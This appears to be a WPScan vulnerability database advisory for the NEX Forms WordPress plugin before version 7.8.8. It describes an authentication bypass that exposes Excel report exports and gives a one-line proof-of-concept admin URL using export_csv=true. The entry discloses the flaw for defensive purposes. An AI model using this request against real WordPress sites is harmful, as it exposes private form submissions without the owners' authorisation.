NEX Forms < 7.8.8 - Authentication Bypass for Excel Reports

2021-07-2000:00:00

wpvulndb

The plugin was vulnerable to Authentication Bypass for Excel Reports allowing unauthenticated attackers to download Excel reports.

http://www.example.com/wp-admin/admin.php?page=nex-forms-dashboard&export_csv=true

References

basixonline.net/nex-forms-wordpress-form-builder-demo/change-log/

codecanyon.net/item/nexforms-the-ultimate-wordpress-form-builder/7103891

github.com/rauschecker/CVEs/tree/main/CVE-2021-34676

Related for WPEX-ID:D7E6BF88-1912-42E3-8139-9A606ED2989F